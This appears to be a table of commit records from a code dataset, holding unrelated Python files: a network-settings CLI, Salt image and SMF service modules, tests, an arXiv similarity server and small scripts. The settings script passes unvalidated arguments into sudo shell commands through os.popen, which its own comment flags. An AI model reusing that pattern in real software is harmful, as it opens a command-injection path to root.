commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
7a64fb0c3093fd23eeed84799c1590a72f59a96c | Create boafiSettings.py | webGUI/boafiSettings.py | webGUI/boafiSettings.py | #!/usr/bin/python
import os,time,argparse

# Command line interface: each flag below maps to one administrative action.
parser = argparse.ArgumentParser()
parser.add_argument('-intf', action='store', dest='intf',default="none",
                    help='Select interface')
parser.add_argument('-ip', action='store', dest='ip',default="none",
                    help='Use given ip address')
parser.add_argument('-reboot', action='store', dest='reboot',default=False,
                    help='Reboot the machine')
parser.add_argument('-down', action='store', dest='down',default="none",
                    help='Shut given interface')
parser.add_argument('-up', action='store', dest='up',default="none",
                    help='Turn on given interface')
parser.add_argument('-restart', action='store', dest='restart',default="none",
                    help='Restart given service')
parser.add_argument('-ifstat', action='store', dest='ifstat',default="none",
                    help='Return bandwith values of given seconds')
results = parser.parse_args()
ip=results.ip
intf=results.intf
reboot=results.reboot
down=results.down
up=results.up
restart=results.restart
ifstat=results.ifstat

# Assign an IP address to an interface (requires both -intf and -ip).
# NOTE(review): arguments are interpolated straight into shell commands via
# os.popen -- never feed untrusted input to this script.
if not(intf=="none"):
    if(ip!="none"):
        os.popen("sudo ifconfig "+intf+" "+ip)
    else:
        print("no ip!")
# -reboot is a plain 'store' action, so any non-empty value triggers it.
if(reboot):
    os.popen("sudo reboot")
if not(up=="none"):
    os.popen("sudo ifconfig "+up+" up")
    print("Up interface"+up)
if not(down=="none"):
    os.popen("sudo ifconfig "+down+" down")
    # Bug fix: this used to print "Up interface" for the interface that
    # was just brought *down*.
    print("Down interface"+down)
if not(restart=="none"):
    os.popen("sudo service "+restart+" restart")
    print("Restarted "+restart)
if not(ifstat=="none"):
    secs=ifstat
    # Sample bandwidth twice per second for the requested number of seconds.
    stats=os.popen("timeout "+secs+"s ifstat -t -q 0.5").read()
    print(stats)
| Python | 0.000001 | |
fdd2a50445d2f2cb92480f8f42c463b312411361 | Add a simple command to print all areas in all generations | mapit/management/commands/mapit_print_areas.py | mapit/management/commands/mapit_print_areas.py | # For each generation, show every area, grouped by type
from django.core.management.base import NoArgsCommand
from mapit.models import Area, Generation, Type, NameType, Country, CodeType
class Command(NoArgsCommand):
    # Management command that dumps every Area to stdout, grouped first
    # by Generation and then by area Type.
    help = 'Show all areas by generation and area type'

    def handle_noargs(self, **options):
        # Walk generations oldest-first so the output is chronological.
        for g in Generation.objects.all().order_by('id'):
            print g
            for t in Type.objects.all().order_by('code'):
                # An area is "in" generation g when its [low, high]
                # generation range contains g.
                qs = Area.objects.filter(type=t,
                                         generation_high__gte=g,
                                         generation_low__lte=g)
                print "  %s (number of areas: %d)" % (t, qs.count())
                for a in qs:
                    print "    ", a
| Python | 0.000003 | |
9dee7d8d253847758d3252401c01215f972a22b1 | Add synthtool scripts (#3765) | google-cloud-monitoring/synth.py | google-cloud-monitoring/synth.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
gapic = gcp.GAPICGenerator()
common_templates = gcp.CommonTemplates()
library = gapic.java_library(
service='monitoring',
version='v3',
config_path='/google/monitoring/artman_monitoring.yaml',
artman_output_name='')
s.copy(library / 'gapic-google-cloud-monitoring-v3/src', 'src')
s.copy(library / 'grpc-google-cloud-monitoring-v3/src', '../../google-api-grpc/grpc-google-cloud-monitoring-v3/src')
s.copy(library / 'proto-google-cloud-monitoring-v3/src', '../../google-api-grpc/proto-google-cloud-monitoring-v3/src')
| Python | 0.000001 | |
92ccb08f72828ba6454bbc3ff162ec73534ceea2 | Interview question: find exact sum of two numbers | python/interviewquestions/find_exact_sum.py | python/interviewquestions/find_exact_sum.py | """
You've built an in-flight entertainment system with on-demand movie streaming.
Users on longer flights like to start a second movie right when their first one
ends, but they complain that the plane usually lands before they can see the
ending. So you're building a feature for choosing two movies whose total
runtimes will equal the exact flight length.
Write a function that takes an integer flight_length (in minutes) and a list
of integers movie_lengths (in minutes) and returns a boolean indicating
whether there are two numbers in movie_lengths whose sum equals flight_length.
When building your function:
Assume your users will watch exactly two movies
Don't make your users watch the same movie twice
Optimize for runtime over memory
"""
"""
We can reword this problem as finding the two numbers in the given list whose
sum is exactly flight_length.
"""
import unittest
def has_valid_movies_combo(l, flight_length):
    """Return True when two *different* movies in ``l`` add up exactly to
    ``flight_length`` minutes, False otherwise.

    Classic two-sum scan: remember every runtime seen so far and, for each
    new movie, check whether its complement was already seen.  Because the
    complement is only looked up among *earlier* movies, a single film of
    exactly half the flight length is never paired with itself.
    O(n) time, O(n) extra space.
    """
    seen = set()
    for runtime in l:
        if flight_length - runtime in seen:
            return True
        seen.add(runtime)
    return False
class TestZeroSum(unittest.TestCase):
    """Behavioural checks for has_valid_movies_combo."""

    # Shared movie catalogue used by the positive/negative cases.
    CATALOGUE = [30, 40, 50, 60, 70]

    def test_true(self):
        for flight in (80, 100, 130, 90):
            self.assertTrue(has_valid_movies_combo(self.CATALOGUE, flight))

    def test_false(self):
        for flight in (10, 30, 40, 14):
            self.assertFalse(has_valid_movies_combo(self.CATALOGUE, flight))

    def test_same_movie(self):
        # A single 30-minute movie must not be paired with itself.
        self.assertFalse(has_valid_movies_combo([30, 40], 60))
if __name__ == "__main__":
unittest.main()
| Python | 0.99999 | |
92f799d0584b598f368df44201446531dffd7d13 | Copy paste artist from filename1 to filename2 | python/utilities/transform_mp3_filenames.py | python/utilities/transform_mp3_filenames.py | # Extract the artist name from songs with filenames in this format:
# (number) - (artist) - (title).mp3
# and add the artists name to songs with filenames in this format:
# (number)..(title).mp3
# to make filenames in this format:
# (number)..(artist)..(title).mp3
#
# eg.: 14 - 13th Floor Elevators - You're Gonna Miss Me.mp3
# + 14..You're Gonna Miss Me.mp3
# => 14..13th Floor Elevators..You're Gonna Miss Me.mp3
#
# Copyright 2017 Dave Cuthbert
# MIT License
from __future__ import print_function #Not needed with python3
import os as os
import re as re
TARGET_DIR = r"/insert/target/path"
def extract_artist(title):
    """Pull the artist name out of a '<n> - <artist> - <title>.mp3' name.

    The non-greedy group captures the text between the first two ' - '
    separators, i.e. the artist field.
    """
    match = re.search(' - (.*?) - ', title)
    return match.group(1)
def get_song_list():
    """Return the file names in the current working directory."""
    return os.listdir(os.getcwd())
def get_artists():
    """Map every song file in the current directory to its artist name."""
    return [extract_artist(song) for song in get_song_list()]
def insert_artist_name():
    """Rename '<n>..<title>.mp3' files in TARGET_DIR to
    '<n>..<artist>..<title>.mp3'.

    Artist names are harvested positionally from the songs in the current
    working directory, so both directories must list the same songs in the
    same order.
    NOTE(review): os.listdir gives no ordering guarantee -- TODO confirm
    the two listings really line up, or sort both explicitly.
    """
    artist_names = get_artists()
    old_filenames = os.listdir(TARGET_DIR)
    for (old_filename, artist) in zip(old_filenames, artist_names):
        # str.replace with count=1 fixes two bugs in the previous
        # re.sub('\.\.', ...) call: every '..' in the name (not just the
        # first separator) was rewritten, and backslashes in the artist
        # name were interpreted as regex escape sequences.
        new_filename = old_filename.replace('..', '..' + artist + '..', 1)
        os.rename(os.path.join(TARGET_DIR, old_filename),
                  os.path.join(TARGET_DIR, new_filename))
if "__main__" == __name__:
#print(*get_artists(), sep='\n') #DEBUG
insert_artist_name() | Python | 0 | |
ec0ee6ffc7b72ba50846bac60ec63e1188bf0481 | test parser | parser.py | parser.py | #!/usr/bin/python3
import requests
import sys
from bs4 import BeautifulSoup
#filters through text from soup and strips text of whitespace
def filterText(text):
    """Decide whether a soup text node is worth printing.

    Returns False for text living inside non-content tags (scripts,
    stylesheets, the document head, ...) and for whitespace-only strings;
    True for everything else.
    """
    # assumes `text` is a NavigableString-like object carrying a .parent tag
    if text.parent.name in ('style', 'script', '[document]', 'head', 'title'):
        return False
    # Bug fix: the old check only caught the four literal strings '\n',
    # ' ', '\r' and '\t'; strip() also rejects runs of mixed whitespace
    # such as '\n\n' or '  ', and the empty string.
    if not text.strip():
        return False
    return True
#prints out url with all text from url on one line
def textParser(url):
    # Echo the URL first (no trailing newline) so the page text follows
    # on the same output line.
    print (url, end='')
    # NOTE(review): no error handling -- a failed request propagates.
    webPage = requests.get(url)
    #format html and only print text from webpage:
    soup = BeautifulSoup(webPage.content, "lxml")
    # findAll(text=True) yields every text node in the document,
    # including script/style contents -- filterText() weeds those out.
    allText = soup.findAll(text=True)
    #print (allText[432])
    for i in allText:
        if filterText(i):
            # Collapse newlines so the whole page prints as one line.
            print (i.replace('\n',' '), end='')
def main():
    """Entry point: parse the default demo page."""
    default_url = "http://en.wikipedia.org/wiki/Web_crawler"
    textParser(default_url)
if __name__ == "__main__":
main()
| Python | 0.000028 | |
c6afa2826d6b1ad425919c0b4bc64101d2d4a2d1 | add first file | deepthought_web.py | deepthought_web.py | import random
import string
import pickle
import cherrypy
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
cherrypy.server.socket_host = '0.0.0.0'
cherrypy.config.update({'server.socket_port': 7071})
class DeepThought(object):
    # CherryPy web app: "similar paper" search over a precomputed TF-IDF
    # matrix of arXiv documents.

    def __init__(self):
        # Artefacts produced by an offline pipeline:
        #   all_identifiers -- row index in X_tfidf -> arXiv identifier
        #   X_tfidf         -- sparse (documents x terms) TF-IDF matrix
        #   meta            -- identifier -> metadata dict (e.g. 'title')
        #   tfidf_vect      -- fitted vectorizer for free-text queries
        self.all_identifiers = pickle.load(open('all_identifiers.pkl'))
        self.X_tfidf = load_sparse_csr('x_tfidf.csr.npz')
        self.meta = pickle.load(open('meta.pkl'))
        self.tfidf_vect = pickle.load(open('tfidf_vect.pkl'))

    @cherrypy.expose
    def index(self):
        # Landing page: one GET form per search endpoint below.
        return """<html>
<head></head>
<body>
<form method="get" action="arxiv_search">
<input type="text" value="1207.4481" name="identifier" />
<button type="submit">Similar Papers</button>
</form>
<form method="get" action="text_search">
<input type="text" value="my astronomy paper" name="text" />
<button type="submit">Similar Papers</button>
</form>
</body>
</html>"""

    def _generate_table(self, ranked_similarity, ranked_identifiers):
        # Render the ranked matches as an HTML table, capped at ~50 rows.
        if np.sum(ranked_similarity) < 1e-10: return "No matches found"
        print ranked_similarity, ranked_identifiers
        j = 0
        table_similarity = []
        table_identifier = []
        table_title = []
        table_link = []
        for simil, identifier in zip(ranked_similarity, ranked_identifiers):
            table_similarity.append(simil)
            table_identifier.append(identifier)
            if identifier in self.meta:
                table_title.append(self.meta[identifier]['title'])
            else:
                table_title.append('Title N/A')
            # New-style arXiv ids contain a dot; otherwise assume an
            # old-style astro-ph id and drop its 8-character prefix.
            if '.' in identifier:
                table_link.append('https://arxiv.org/abs/{0}'.format(identifier))
            else:
                table_link.append('https://arxiv.org/abs/astro-ph/{0}'.format(identifier[8:]))
            j+=1
            print 'at', j
            if j > 50:
                break
        data_table = pd.DataFrame(zip(table_identifier, table_title, table_link, table_similarity),
                                  columns = ['identifier', 'title', 'link', 'similarity'])
        return data_table.to_html()

    def _get_similar_documents(self, test_document):
        # Similarity = dot product of every corpus row with the query
        # vector (.A densifies the sparse result); highest score first.
        similarity = np.squeeze((self.X_tfidf * test_document.T).A)
        similarity_argsort = np.argsort(similarity)[::-1]
        ranked_similarity = similarity[similarity_argsort]
        ranked_identifiers = np.array(self.all_identifiers)[similarity_argsort]
        return ranked_similarity, ranked_identifiers

    @cherrypy.expose
    def arxiv_search(self, identifier='1207.4481'):
        # Papers similar to an existing arXiv paper, looked up by id.
        if identifier not in self.all_identifiers:
            return "unknown identifier {0}".format(identifier)
        else:
            test_document_id = self.all_identifiers.index(identifier)
            test_document = self.X_tfidf[test_document_id]
            ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
            return self._generate_table(ranked_similarity, ranked_identifiers)
        #return ''.join(random.sample(string.hexdigits, int(length)))

    @cherrypy.expose
    def text_search(self, text='astronomy galaxy star'):
        # Free-text search: vectorize the query with the fitted
        # vectorizer, then rank the corpus by similarity.
        test_document = self.tfidf_vect.transform([text])
        ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
        return self._generate_table(ranked_similarity, ranked_identifiers)
def save_sparse_csr(filename, array):
    """Persist a scipy CSR matrix to an .npz archive.

    Stores the three raw CSR buffers plus the shape -- exactly the four
    arrays load_sparse_csr() needs to rebuild the matrix.
    """
    np.savez(filename,
             data=array.data,
             indices=array.indices,
             indptr=array.indptr,
             shape=array.shape)
def load_sparse_csr(filename):
    """Rebuild a scipy CSR matrix saved by save_sparse_csr()."""
    archive = np.load(filename)
    return csr_matrix((archive['data'], archive['indices'], archive['indptr']),
                      shape=archive['shape'])
if __name__ == '__main__':
print 'loading...'
dt = DeepThought()
print "loading done"
cherrypy.quickstart(dt)
| Python | 0.000001 | |
58e0ea4b555cf89ace4f5d97c579dbba905e7eeb | Add script to list objects | jsk_arc2017_common/scripts/list_objects.py | jsk_arc2017_common/scripts/list_objects.py | #!/usr/bin/env python
import os.path as osp
import rospkg

PKG_PATH = rospkg.RosPack().get_path('jsk_arc2017_common')

# Class list for the ARC2017 object set: label 0 is reserved for the
# background, the shelf gets the final label, and everything in between
# comes from the package's names file (one object per line).
object_names = ['__background__']
with open(osp.join(PKG_PATH, 'data/names/objects.txt')) as f:
    object_names += [x.strip() for x in f]
object_names.append('__shelf__')

# Print "<label id>: <name>" for every class.
for obj_id, obj in enumerate(object_names):
    print('%2d: %s' % (obj_id, obj))
| Python | 0.000001 | |
04feafc2b3a13b394d5b510e9bc48e542d4880c5 | Create pfkill.py | pfkill.py | pfkill.py | """
how to use it:
    $ python pfkill <port number>

what it does:
    1. read the <port number>.pid file
    2. send a quit signal to the running app
    3. delete <port number>.rule
    4. delete <port number>.pid
"""
import os
import sys
import signal
# import logging

# The port number is the only positional argument; the .pid/.rule files
# are looked up in the current working directory.
port = sys.argv[1]

# read <port>.pid -- the first line holds the process id
pid = int(open("%s.pid" % port, 'r').read().split('\n')[0])
# print pid

# kill app by pid
# signal.SIGQUIT or signal.SIGKILL
try:
    os.kill(pid, signal.SIGQUIT)
except OSError, e:
    # Process already gone (or not ours): report and still perform the
    # file cleanup below.
    print e
    # logging.INFO("ee")

# delete <port>.rule
os.unlink("%s.rule" % port)
# delete <port>.pid
os.unlink("%s.pid" % port)

# todo: exit
| Python | 0.000001 | |
e988a10ea18b644b9bc319286d75cb2a15079c59 | add case owners endpoint | corehq/apps/reports/v2/endpoints/case_owner.py | corehq/apps/reports/v2/endpoints/case_owner.py | from __future__ import absolute_import
from __future__ import unicode_literals
from corehq.apps.reports.filters.controllers import (
CaseListFilterOptionsController,
)
from corehq.apps.reports.v2.models import BaseOptionsEndpoint
class CaseOwnerEndpoint(BaseOptionsEndpoint):
    """Paginated case-owner options for the report filter UI."""
    slug = "case_owner"

    @property
    def search(self):
        """Free-text search term sent by the filter widget."""
        return self.data.get('search', '')

    @property
    def page(self):
        """Requested page number (defaults to the first page)."""
        return self.data.get('page', 1)

    def get_response(self):
        """Build the select2-style payload of matching case owners."""
        controller = CaseListFilterOptionsController(
            self.request, self.domain, self.search
        )
        has_more, results = controller.get_options(show_more=True)
        return {
            'results': results,
            'pagination': {'more': has_more},
        }
| Python | 0 | |
458091fe923038fe8537bf3b9efbff6157a7e57a | add tests for riakcached.clients.ThreadedRiakClient | riakcached/tests/test_threadedriakclient.py | riakcached/tests/test_threadedriakclient.py | import mock
import unittest2
from riakcached.clients import ThreadedRiakClient
import riakcached.pools
class TestThreadedRiakClient(unittest2.TestCase):
    # Exercises the threaded bulk operations against a mocked connection
    # pool -- no real Riak server is involved.

    def test_get_many(self):
        # The pool answers every request with the same 200/"result" body.
        pool = mock.Mock(spec=riakcached.pools.Pool)
        pool.request.return_value = 200, "result", {"content-type": "text/plain"}
        pool.url = "http://127.0.0.1:8098"
        client = ThreadedRiakClient("test_bucket", pool=pool)
        results = client.get_many(["test1", "test2"])
        self.assertEqual(results, {
            "test1": "result",
            "test2": "result",
        })
        # One GET per key; thread scheduling order is irrelevant, hence
        # assert_any_call instead of assert_has_calls.
        self.assertEqual(2, pool.request.call_count)
        pool.request.assert_any_call(
            method="GET",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
        )
        pool.request.assert_any_call(
            method="GET",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
        )

    def test_set_many(self):
        # Stores issue one POST per key with the value as the body.
        pool = mock.Mock(spec=riakcached.pools.Pool)
        pool.request.return_value = 200, "", {"content-type": "text/plain"}
        pool.url = "http://127.0.0.1:8098"
        client = ThreadedRiakClient("test_bucket", pool=pool)
        client.set_many({
            "test1": "value1",
            "test2": "value2",
        })
        self.assertEqual(2, pool.request.call_count)
        pool.request.assert_any_call(
            method="POST",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
            body="value1",
            headers={
                "Content-Type": "text/plain",
            },
        )
        pool.request.assert_any_call(
            method="POST",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
            body="value2",
            headers={
                "Content-Type": "text/plain",
            },
        )

    def test_delete_many(self):
        # Deletes issue one DELETE per key; Riak answers 204 No Content.
        pool = mock.Mock(spec=riakcached.pools.Pool)
        pool.request.return_value = 204, "", {}
        pool.url = "http://127.0.0.1:8098"
        client = ThreadedRiakClient("test_bucket", pool=pool)
        client.delete_many(["test1", "test2"])
        self.assertEqual(2, pool.request.call_count)
        pool.request.assert_any_call(
            method="DELETE",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
        )
        pool.request.assert_any_call(
            method="DELETE",
            url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
        )
| Python | 0 | |
1d388bf1a38eaaafa4d79287ce7aabb59f84e649 | Add initial img module | salt/modules/img.py | salt/modules/img.py | '''
Virtual machine image management tools
'''
def mnt_image(location):
    '''
    Mount the named image and return the mount point

    CLI Example::

        salt '*' img.mount_image /tmp/foo
    '''
    if 'guestfs.mount' in __salt__:
        return __salt__['guestfs.mount'](location)
    elif 'qemu_nbd' in __salt__:
        mnt = __salt__['qemu_nbd.init'](location)
        # qemu_nbd.init returns {<mountpoint>: <info>}.  Remember the
        # mapping keyed by the mountpoint so umount_image() can find it.
        # Bug fix: this used to evaluate 'img.mnt_{0}'.location -- an
        # attribute access on a str -- which raised AttributeError.
        mpt = next(iter(mnt))
        __context__['img.mnt_{0}'.format(mpt)] = mnt
        return mpt
    return ''
def umount_image(mnt):
    '''
    Unmount an image mountpoint

    CLI Example::

        salt '*' img.umount_image /mnt/foo
    '''
    if 'qemu_nbd.clear' in __salt__:
        if 'img.mnt_{0}'.format(mnt) in __context__:
            # Bug fix: '.fomat(' (typo for .format) raised
            # AttributeError whenever this branch was reached.
            __salt__['qemu_nbd.clear'](__context__['img.mnt_{0}'.format(mnt)])
            return
    # Fall back to a plain unmount when no NBD mapping is tracked.
    __salt__['mount.umount'](mnt)
def seed(location, id_='', config=None):
    '''
    Make sure that the image at the given location is mounted, salt is
    installed, keys are seeded, and execute a state run

    CLI Example::

        salt '*' img.seed /tmp/image.qcow2
    '''
    # NOTE(review): this function uses os, shutil, yaml and salt.crypt,
    # none of which are imported in this file -- confirm the missing
    # imports upstream.
    if config is None:
        config = {}
    mpt = mnt_image(location)
    mpt_tmp = os.path.join(mpt, 'tmp')
    # The chroot needs a populated /dev to run the bootstrap script.
    __salt__['mount.mount'](
            os.path.join(mpt, 'dev'),
            'udev',
            fstype='devtmpfs')
    # Verify that the boostrap script is downloaded
    bs_ = __salt__['config.gather_bootstrap_script']()
    # Apply the minion config
    # Generate the minion's key
    salt.crypt.gen_keys(mpt_tmp, 'minion', 2048)
    # TODO Send the key to the master for approval
    # Execute chroot routine
    sh_ = '/bin/sh'
    if os.path.isfile(os.path.join(mpt, 'bin/bash')):
        sh_ = '/bin/bash'
    # Copy script into tmp
    shutil.copy(bs_, os.path.join(mpt, 'tmp'))
    # Fall back to this master's address unless the caller configured one.
    if not 'master' in config:
        config['master'] = __opts__['master']
    if id_:
        config['id'] = id_
    with open(os.path.join(mpt_tmp, 'minion'), 'w+') as fp_:
        fp_.write(yaml.dump(config, default_flow_style=False))
    # Generate the chroot command
    c_cmd = 'sh /tmp/bootstrap.sh'
    cmd = 'chroot {0} {1} -c \'{2}\''.format(
            mpt,
            sh_,
            c_cmd)
    __salt__['cmd.run'](cmd)
    # Undo the devtmpfs mount before releasing the image itself.
    __salt__['mount.umount'](os.path.join(mpt, 'dev'))
    umount_image(mpt)
def bootstrap(location, size, fmt):
    '''
    HIGHLY EXPERIMENTAL
    Bootstrap a virtual machine image

    location:
        The location to create the image

    size:
        The size of the image to create in megabytes

    fmt:
        The image format, raw or qcow2

    CLI Example::

        salt '*' qemu_nbd.bootstrap /srv/salt-images/host.qcow 4096 qcow2
    '''
    # Create the backing file, attach it to an NBD device, then carve out
    # and format a single ext4 partition covering the whole disk.
    location = __salt__['img.make_image'](location, size, fmt)
    if not location:
        return ''
    nbd = __salt__['qemu_nbd.connect'](location)
    __salt__['partition.mklabel'](nbd, 'msdos')
    __salt__['partition.mkpart'](nbd, 'primary', 'ext4', 1, -1)
    __salt__['partition.probe'](nbd)
    __salt__['partition.mkfs']('{0}p1'.format(nbd), 'ext4')
    mnt = __salt__['qemu_nbd.mount'](nbd)
    # NOTE(review): the final package-bootstrap step is still commented
    # out, so the mounted image is currently left as-is.
    #return __salt__['pkg.bootstrap'](nbd, mnt.keys()[0])
| Python | 0 | |
ae5407acd1fb93fe04747a10b7bda2fc1ec91790 | add smf module to support virtual service module on solaris 10+ | salt/modules/smf.py | salt/modules/smf.py | '''
Service support for Solaris 10 and 11, should work with other systems
that use SMF also. (e.g. SmartOS)
'''
def __virtual__():
    '''
    Only work on systems which default to SMF
    '''
    # SMF only exists on Solaris 10 and later, so refuse to load
    # anywhere else -- including Solaris 9 (SunOS 5.9).
    if __grains__['os'] != 'Solaris':
        return False
    if __grains__['kernelrelease'] == "5.9":
        return False
    return 'service'
def get_enabled():
    '''
    Return the enabled services

    CLI Example::

        salt '*' service.get_enabled
    '''
    cmd = 'svcs -H -o SVC,STATE -s SVC'
    enabled = set()
    for line in __salt__['cmd.run'](cmd).split('\n'):
        fields = line.split()
        # Skip blank lines; anything reported online counts as enabled.
        if fields and 'online' in line:
            enabled.add(fields[0])
    return sorted(enabled)
def get_disabled():
    '''
    Return the disabled services

    CLI Example::

        salt '*' service.get_disabled
    '''
    cmd = 'svcs -aH -o SVC,STATE -s SVC'
    disabled = set()
    for line in __salt__['cmd.run'](cmd).split('\n'):
        fields = line.split()
        # Anything that is neither online nor a legacy init script
        # counts as disabled.
        if fields and 'online' not in line and 'legacy_run' not in line:
            disabled.add(fields[0])
    return sorted(disabled)
def get_all():
    '''
    Return all installed services

    CLI Example::

        salt '*' service.get_all
    '''
    cmd = 'svcs -aH -o SVC,STATE -s SVC'
    lines = __salt__['cmd.run'](cmd).split('\n')
    # The first whitespace-separated field of every non-empty line is
    # the service FMRI.
    return sorted(set(line.split()[0] for line in lines if line.split()))
def start(name):
    '''
    Start the specified service

    CLI Example::

        salt '*' service.start <service name>
    '''
    # svcadm -t makes the state change temporary (lost at next boot).
    return not __salt__['cmd.retcode']('/usr/sbin/svcadm enable -t {0}'.format(name))
def stop(name):
    '''
    Stop the specified service

    CLI Example::

        salt '*' service.stop <service name>
    '''
    # svcadm -t makes the state change temporary (lost at next boot).
    return not __salt__['cmd.retcode']('/usr/sbin/svcadm disable -t {0}'.format(name))
def restart(name):
    '''
    Restart the named service

    CLI Example::

        salt '*' service.restart <service name>
    '''
    return not __salt__['cmd.retcode']('/usr/sbin/svcadm restart {0}'.format(name))
def status(name, sig=None):
    '''
    Return the status for a service, returns a bool whether the service is
    running.

    CLI Example::

        salt '*' service.status <service name>
    '''
    # `sig` is accepted for signature compatibility with the other
    # service modules but is not used by SMF.
    cmd = '/usr/bin/svcs -H -o STATE {0}'.format(name)
    line = __salt__['cmd.run'](cmd).strip()
    # Collapsed the redundant if/else: the comparison already yields the
    # boolean we want.
    return line == 'online'
def enable(name):
    '''
    Enable the named service to start at boot

    CLI Example::

        salt '*' service.enable <service name>
    '''
    # Without -t the change is persistent across reboots.
    return not __salt__['cmd.retcode']('/usr/sbin/svcadm enable {0}'.format(name))
def disable(name):
    '''
    Disable the named service to start at boot

    CLI Example::

        salt '*' service.disable <service name>
    '''
    # Without -t the change is persistent across reboots.
    return not __salt__['cmd.retcode']('/usr/sbin/svcadm disable {0}'.format(name))
def enabled(name):
    '''
    Check to see if the named service is enabled to start on boot

    CLI Example::

        salt '*' service.enabled <service name>
    '''
    # Delegates to get_enabled(), which lists services reported online.
    return name in get_enabled()
def disabled(name):
    '''
    Check to see if the named service is disabled to start on boot

    CLI Example::

        salt '*' service.disabled <service name>
    '''
    # Delegates to get_disabled(): not online and not a legacy script.
    return name in get_disabled()
| Python | 0 | |
a91a942c45921b64fe0d740d81604dba921c214e | Create folder for QC and CNV cutoff codes | bin/cutoffs/__init__.py | bin/cutoffs/__init__.py | Python | 0 | ||
e40b92966762dfadff53355e9e38636a4769543f | Add intermediate tower 2 | pythonwarrior/towers/intermediate/level_002.py | pythonwarrior/towers/intermediate/level_002.py | # ----
# |@s |
# | sS>|
# ----
level.description("Another large room, but with several enemies "
"blocking your way to the stairs.")
level.tip("Just like walking, you can attack_ and feel in multiple "
"directions ('forward', 'left', 'right', 'backward').")
level.clue("Call warrior.feel(direction).is_enemy() in each direction "
"to make sure there isn't an enemy beside you "
"(attack if there is). "
"Call warrior.rest_ if you're low and health when there "
"are no enemies around.")
level.time_bonus(40)
level.ace_score(84)
level.size(4, 2)
level.stairs(3, 1)
def add_abilities(warrior):
    """Grant the abilities this level expects the warrior to use."""
    for ability in ('attack_', 'health', 'rest_'):
        warrior.add_abilities(ability)
level.warrior(0, 0, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('thick_sludge', 2, 1, 'west')
level.unit('sludge', 1, 1, 'north')
| Python | 0.999719 | |
71d66fb3bdbcb38d29accb6bdfbf4ac8b2996e89 | Add intermediate tower 3 | pythonwarrior/towers/intermediate/level_003.py | pythonwarrior/towers/intermediate/level_003.py | # ---
# |>s |
# |s@s|
# | C |
# ---
level.description("You feel slime on all sides, you're surrounded!")
level.tip("Call warrior.bind_(direction) to bind an enemy to keep him "
"from attacking. Bound enemies look like captives.")
level.clue("Count the number of enemies around you. Bind an enemy if "
"there are two or more.")
level.time_bonus(50)
level.ace_score(101)
level.size(3, 3)
level.stairs(0, 0)
def add_abilities(warrior):
    """Grant the abilities this level expects the warrior to use."""
    for ability in ('bind_', 'rescue_'):
        warrior.add_abilities(ability)
level.warrior(1, 1, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('captive', 1, 2, 'west')
level.unit('sludge', 0, 1, 'west')
level.unit('sludge', 2, 1, 'west')
| Python | 0.999787 | |
260cb76132bfe618b58cf34ad8dd61f59e847f90 | create table | zaifbot/models/nonce.py | zaifbot/models/nonce.py | from sqlalchemy import Column, Integer, String, DateTime
from datetime import datetime
from zaifbot.models import Base
class Nonce(Base):
    """Per-API-key monotonically increasing nonce for signed requests."""
    __tablename__ = 'nonces'

    id = Column(Integer, primary_key=True)
    # API credentials this nonce counter belongs to.
    key = Column(String, nullable=False)
    secret = Column(String, nullable=False)
    nonce = Column(Integer, default=0, nullable=False)
    # Bug fix: datetime.now() was being *called* at import time, so every
    # row got the module-load timestamp.  Passing the callable lets
    # SQLAlchemy evaluate it at INSERT/UPDATE time instead.
    created_at = Column(DateTime, default=datetime.now)
    updated_at = Column(DateTime, default=datetime.now, onupdate=datetime.now)
| Python | 0.00008 | |
a72567202e9b4024758706c00f016153ec04a53d | Create render.py | render.py | render.py | #! /usr/bin/python3
from random import random
import pyglet
from pyglet.window import key, Window
from pyglet.gl import *
from pyglet.gl.glu import *
window = Window()


@window.event
def on_draw():
    pass  # TODO: implement!


@window.event
def on_resize(width, height):
    pass  # TODO: implement!


@window.event
def on_key_press(symbol, modifiers):
    # Left/right arrow keys step the animation backwards/forwards.
    if symbol == key.LEFT:
        update_frame(-1)
    elif symbol == key.RIGHT:
        update_frame(1)


def update_frame(dt_or_step):
    """Advance the animation.

    Called both by the scheduler (with the elapsed time) and by
    on_key_press (with a +/-1 step).
    Bug fix: update_frame was referenced but never defined, so the
    schedule_interval() call below raised NameError at startup.
    """
    pass  # TODO: implement!


if __name__=="__main__":
    pyglet.clock.schedule_interval(update_frame, 0.02)
    pyglet.app.run()
| Python | 0.000001 | |
77dca533f2d2fe94b233bd48561e1ed887928265 | add sample.py | sample.py | sample.py | #-*- coding: UTF-8 -*-
# https://github.com/carpedm20/LINE
from line import LineClient, LineGroup, LineContact

# Credentials file: first line is the LINE id, second line the password.
f = open("credentials")
ID = f.readline().strip()
PASSWD = f.readline().strip()
f.close()

client = LineClient(ID, PASSWD, com_name="line_api_demo")

# List every contact with its index so a target can be picked below.
friends = client.contacts
for i, friend in enumerate(friends):
    print i, friend

#for i, group in enumerate(groups):
#    print i, group

# NOTE(review): 429 is a hard-coded contact index from the author's own
# account -- adjust it before running against another account.
friend = client.contacts[429]
friend.sendMessage("hello world! 本訊息由機器人寄送 XD")
| Python | 0.000001 | |
